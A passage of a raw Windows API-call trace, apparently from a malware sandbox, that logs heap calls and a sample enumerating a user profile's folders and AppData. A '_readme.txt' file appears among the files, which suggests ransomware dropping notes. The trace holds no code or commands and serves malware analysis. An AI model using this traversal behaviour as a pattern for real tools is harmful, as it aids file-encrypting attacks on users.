HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c6b8 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.808] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c6b8 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.808] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0165.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0165.809] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x214) returned 0x3b39e58 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c870 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c8c8 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c920 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c978 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b45028 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c9d0 [0165.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b45090 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362ca28 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ef0 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f58 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44fc0 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c6b8 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b424b0 | out: hHeap=0xcd0000) returned 1 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.810] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34a78 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34a78 | out: hHeap=0xcd0000) returned 1 [0165.810] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c6b8 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44fc0 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44f58 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44fc0 | out: hHeap=0xcd0000) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c818 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0165.811] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0165.811] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608ae0 | out: hHeap=0xcd0000) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410b0 | out: hHeap=0xcd0000) returned 1 [0165.811] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.811] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.812] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.812] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.812] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.812] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0165.812] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.812] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.812] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.812] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.812] PathFindFileNameW (pszPath="") returned="" [0165.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.812] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.812] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.812] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1777ff60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1777ff60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0165.812] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0165.812] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0165.812] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, 